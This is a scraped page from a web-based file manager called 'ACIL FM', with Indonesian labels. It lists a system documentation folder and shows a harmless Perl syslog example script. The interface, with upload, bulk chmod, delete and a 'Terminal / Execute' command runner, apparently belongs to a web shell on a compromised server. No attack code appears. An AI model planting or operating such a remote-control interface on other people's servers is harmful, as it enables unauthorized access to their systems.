ACIL FM
Dark
Refresh
Current DIR:
/usr/share/doc/perl-Sys-Syslog/eg
/
usr
share
doc
perl-Sys-Syslog
eg
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
syslog.pl
322 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /usr/share/doc/perl-Sys-Syslog/eg/syslog.pl
#!/usr/bin/perl use strict; use warnings; use Sys::Syslog; die "usage: $0 facility/priority message\n" unless @ARGV; my ($facility, $priority) = split "/", shift; my $message = join " ", @ARGV; openlog($0, "ndelay,pid", $facility) or die "fatal: can't open syslog: $!\n"; syslog($priority, "%s", $message); closelog();
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply